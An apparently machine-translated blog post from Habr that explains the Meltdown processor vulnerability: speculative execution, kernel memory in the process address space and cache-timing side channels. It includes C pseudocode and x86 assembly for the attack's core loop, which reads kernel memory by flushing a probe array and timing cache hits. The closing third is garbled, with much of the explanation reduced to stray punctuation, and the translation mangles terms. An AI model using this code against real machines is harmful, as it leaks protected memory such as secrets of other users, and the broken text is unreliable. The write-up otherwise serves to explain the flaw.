The words Meltdown and Specter, fresh vulnerabilities in processors are already on the third day. Unfortunately, I immediately found something about how exactly these vulnerabilities work (for a start I focused on Meldown, it is simpler), I did not succeed, I had to study original publications and articles: the original article , the Google Project Zero block , the article already from of the summer of 2017 . Despite the fact that there is already a translation of the introduction from the original publication in Habré, I would like to share what I was able to read and understand.
UPD : added pseudocode to attack description
The last decades, since 1992, when the first Pentium appeared, Intel developed the superscalar architecture of its processors. The bottom line is that the company really wanted to make processors faster, while maintaining backward compatibility. As a result, modern processors are a very complex structure. Just imagine: the compiler works with all its might and packs instructions so that they are executed in one thread, and the processor inside it pulls the code into separate instructions, and starts to execute them in parallel, if possible, while also reordering them. And all this is due to the fact that there are a lot of hardware blocks for executing commands in the processor, each instruction usually involves only one of them. It adds fuel to the fire and the fact that the clock frequency of the processors grew much faster than the speed of the RAM, which led to the appearance of caches 1, 2 and 3 levels. Going to RAM costs more than 100 processor cycles, going to Level 1 cache is already one, and performing some simple arithmetic operation like addition is a couple of cycles.
As a result, while one instruction is waiting to receive data from memory, to release the floating point unit, well, or something else, the processor speculatively works out the following. Modern processors can thus process in parallel the order of hundreds of instructions (97 in Sky Lake, to be exact). Each such instruction works with its own copies of the registers (this happens at the reservation station), and they, at the time of execution, do not affect each other. After the instruction is executed, the processor tries to line up the result of their execution in the retirement block, as if all this magic of superscalarity did not exist (the compiler knows nothing about it and thinks that there is a sequential execution of commands — remember this?) . If for some reason the processor decides that the instruction was executed incorrectly, for example, because it used the register value that the previous instruction actually changed, then the current instruction will simply be thrown away. The same thing happens when changing the value in memory, or if the predictor of transitions was wrong.
By the way, it should become clear how hyper-trading works - we add the second Register allocation table, and the second block of the Retirement register file - and voila, we already have two cores, almost for free.
In the 64-bit mode of operation, each application has its own dedicated piece of readable and writable memory, which is actually userpace memory. However, in fact, the kernel memory is also present in the address space of the process (I suspect that this was done in order to improve the performance of the syscols), but is protected from access from user code. If he tries to access this memory, he will get an error, it works at the level of the processor and its protection rings.
When you can not read any data, you can try to take advantage of the side effects of the object of attack. A classic example: measuring electricity consumption with high accuracy, you can distinguish the operations that the processor performs; this is how the chip for KeeLoq's car alarm systems was hacked. In the case of Meltdown, this side channel is the time to read the data. If the data byte is contained in the cache, it will be read much faster than if it is read from the RAM and loaded into the cache.
Actually, the essence of the attack is very simple and quite beautiful:
char userspace_array[256*4096];
for (i = 0; i < 256*4096; i++) {
_mm_clflush(&userspace_array[i]);
}const char* kernel_space_ptr = 0xBAADF00D;
char tmp = *kernel_space_ptr;char not_used = userspace_array[tmp * 4096];for (i = 0; i < 256; i++) {
if (is_in_cache(userspace_array[i*4096])) {
    // Got it! *kernel_space_ptr == i
}
}, , .
; rcx = kernel address
; rbx = probe array
retry:
mov al, byte [rcx]
shl rax, 0xc
jz retry
mov rbx, qword [rbx + rax], .mov al, byte [rcx] — , . , , .shl rax, 0xc — 4096 ,mov rbx, qword [rbx + rax] — "" ,retry jz retry - , , , . , , — rax , . , , , .
— , Kernel page-table isolation. , 1.5 .
Source: https://habr.com/ru/post/346078/
All Articles